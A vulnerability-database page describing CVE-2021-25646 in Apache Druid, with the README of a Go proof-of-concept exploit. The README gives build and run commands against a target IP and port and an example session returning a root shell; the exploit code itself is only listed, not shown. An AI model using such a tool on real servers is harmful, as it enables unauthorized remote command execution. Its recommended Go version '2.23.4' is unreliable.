关联漏洞
标题:
Apache Druid 访问控制错误漏洞
(CVE-2021-25646)
描述:Apache Druid是美国阿帕奇软件(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库。 Apache Druid 0.20.0和更早的版本存在访问控制错误漏洞,该漏洞允许经过身份验证的用户强制Druid运行用户提供的JavaScript代码,并执行服务器进程特权的代码。
描述
A proof-of-concept for the CVE-2021-25646, which allows for Command Injection
介绍
# CVE-2021-25646 Proof-of-Concept (Go Version)
## Overview
This repository contains a proof-of-concept (PoC) exploit for [CVE-2021-25646](https://nvd.nist.gov/vuln/detail/CVE-2021-25646), a critical remote code execution vulnerability in [Apache Druid](https://druid.apache.org/).
The exploit is written in Go and allows for interactive command injection via the terminal.
---
## Features
- **Interactive Command Injection:**
Execute arbitrary commands on a vulnerable Apache Druid server through an interactive shell interface.
---
## Build
You need [Go](https://golang.org/dl/) installed (version 2.23.4 recommended).
```bash
go build .
```
This will produce a binary in the current directory.
---
## Usage
You can run the exploit either by building the binary or directly with `go run`.
### Command-Line Options
- `-i` : Target Druid server IP address (required)
- `-p` : Target Druid server port (required)
- `-proxy` : Specifying the proxy url (optional)
### Examples
**Run the built binary:**
```bash
./cve -i 127.0.0.1 -p 8888
```
**Or run directly with Go:**
```bash
go run main.go -i 127.0.0.1 -p 8888
```
---
## Example Session
```bash
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
```
---
## Technical Details
- **Vulnerability:**
The exploit abuses improper input validation in the Druid `indexer` component, specifically in the `task` API, allowing for command injection via crafted JSON payloads.
- **References:**
- [CVE-2021-25646 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2021-25646)
- [Apache Druid Security Advisory](https://github.com/apache/druid/security/advisories/GHSA-2p3x-3w7x-v2wq)
---
## ToDo
- [ ] Add support for HTTPS
- [ ] Automate switch to reverse shell
- [ ] More native command prompt feeling
---
## Disclaimer
This software is provided **for educational purposes only**.
The author is **not responsible** for any misuse or damage caused by this code.
Always obtain **proper authorization** before testing any system.
文件快照
[4.0K] /data/pocs/66e083fe3c31a250d8818822e19edbba1c8aaad8
├── [ 22] go.mod
├── [1.2K] main.go
├── [2.0K] README.md
└── [4.0K] utils
└── [1.8K] payload.go
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。